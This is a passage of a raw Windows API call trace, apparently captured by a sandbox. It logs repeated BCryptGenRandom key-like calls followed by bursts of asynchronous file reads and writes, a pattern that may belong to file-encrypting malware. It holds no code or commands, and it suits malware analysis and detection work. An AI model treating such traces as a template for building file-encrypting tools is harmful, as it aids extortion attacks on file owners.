calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0088.777] free (_Block=0x77d800) [0088.777] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0088.777] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0088.778] free (_Block=0x1ff1930) [0088.778] free (_Block=0x1ff1a40) [0088.778] free (_Block=0x77d908) [0088.778] WriteFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0088.779] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0089.340] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0089.343] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0089.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0089.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0089.351] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0089.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0089.359] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0089.359] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0089.359] free (_Block=0x77d800) [0089.359] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0089.359] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0089.360] free (_Block=0x1ff1930) [0089.360] free (_Block=0x1ff1a40) [0089.360] free (_Block=0x77d908) [0089.360] WriteFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0089.361] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0089.377] CloseHandle (hObject=0x3ac) returned 1 [0089.378] free (_Block=0x1fb18c0) [0089.378] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0091.847] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0091.875] WriteFile (in: hFile=0x1198, lpBuffer=0x3db00ec, nNumberOfBytesToWrite=0x1930, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0091.875] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0091.893] ReadFile (in: hFile=0x119c, lpBuffer=0x3df015c, nNumberOfBytesToRead=0x15f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 1 [0091.894] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0091.895] CloseHandle (hObject=0x119c) returned 1 [0091.895] free (_Block=0x3df0128) [0091.895] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.024] ReadFile (in: hFile=0x1194, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xb05, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.024] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.025] CloseHandle (hObject=0x1194) returned 1 [0092.026] free (_Block=0x1ff1e60) [0092.026] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.039] ReadFile (in: hFile=0x11a0, lpBuffer=0x3e301cc, nNumberOfBytesToRead=0x143e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30198 | out: lpBuffer=0x3e301cc*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30198) returned 1 [0092.040] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.040] CloseHandle (hObject=0x11a0) returned 1 [0092.042] free (_Block=0x3e30198) [0092.047] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.092] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.095] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0092.095] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.098] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0092.098] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.098] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.098] free (_Block=0x77d800) [0092.098] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.098] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.099] free (_Block=0x2071008) [0092.099] free (_Block=0x2071118) [0092.099] free (_Block=0x77d908) [0092.099] WriteFile (in: hFile=0x11a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.099] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.125] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.127] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0092.127] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.130] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0092.133] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.133] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.133] free (_Block=0x77d800) [0092.133] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.133] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.135] free (_Block=0x2071008) [0092.135] free (_Block=0x2071118) [0092.135] free (_Block=0x77d908) [0092.135] WriteFile (in: hFile=0x1194, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0092.136] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.164] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.167] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0092.167] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.170] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0092.174] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.174] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.174] free (_Block=0x77d800) [0092.174] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.174] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.175] free (_Block=0x2071008) [0092.175] free (_Block=0x2071118) [0092.175] free (_Block=0x77d908) [0092.175] WriteFile (in: hFile=0x13d8, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0092.175] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.410] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0092.410] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.429] CloseHandle (hObject=0x13d8) returned 1 [0092.429] free (_Block=0x3df0008) [0092.429] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.452] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.455] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0092.455] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.457] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0092.461] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.461] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.461] free (_Block=0x77d800) [0092.461] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.461] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.462] free (_Block=0x2071008) [0092.462] free (_Block=0x2071118) [0092.462] free (_Block=0x77d908) [0092.462] WriteFile (in: hFile=0x11a0, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0092.462] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.630] CloseHandle (hObject=0x13dc) returned 1 [0092.630] free (_Block=0x1ff1e60) [0092.630] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.655] CloseHandle (hObject=0x1194) returned 1 [0092.655] free (_Block=0x3d70048) [0092.655] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.670] WriteFile (in: hFile=0x11a0, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x2140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0092.670] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.685] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x20d6, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.687] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.906] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.907] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.933] WriteFile (in: hFile=0x13d8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0092.933] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.948] ReadFile (in: hFile=0x11a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0092.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0092.955] CloseHandle (hObject=0x11a0) returned 1 [0092.956] free (_Block=0x3d70048) [0092.956] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.001] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.005] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0093.005] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.007] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0093.008] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0093.008] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0093.008] free (_Block=0x77d800) [0093.008] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0093.008] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0093.008] free (_Block=0x2071008) [0093.008] free (_Block=0x2071118) [0093.008] free (_Block=0x77d908) [0093.008] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.009] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.011] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x11280, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.013] CloseHandle (hObject=0x13dc) returned 1 [0093.013] free (_Block=0x1ff1e60) [0093.013] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.036] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.040] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0093.040] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.043] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0093.044] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0093.044] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0093.044] free (_Block=0x77d800) [0093.044] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0093.044] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0093.045] free (_Block=0x2071008) [0093.045] free (_Block=0x2071118) [0093.045] free (_Block=0x77d908) [0093.045] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.045] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.048] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x31270, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.048] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.051] CloseHandle (hObject=0x13dc) returned 1 [0093.051] free (_Block=0x1ff1e60) [0093.052] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.071] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.073] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0093.074] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.076] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0093.076] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0093.077] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0093.077] free (_Block=0x77d800) [0093.077] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0093.077] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0093.077] free (_Block=0x2071008) [0093.077] free (_Block=0x2071118) [0093.077] free (_Block=0x77d908) [0093.077] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.078] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.079] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x10ea0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.079] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.118] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.121] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0093.123] CloseHandle (hObject=0x13dc) returned 1 [0093.128] free (_Block=0x1ff1e60) [0093.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: 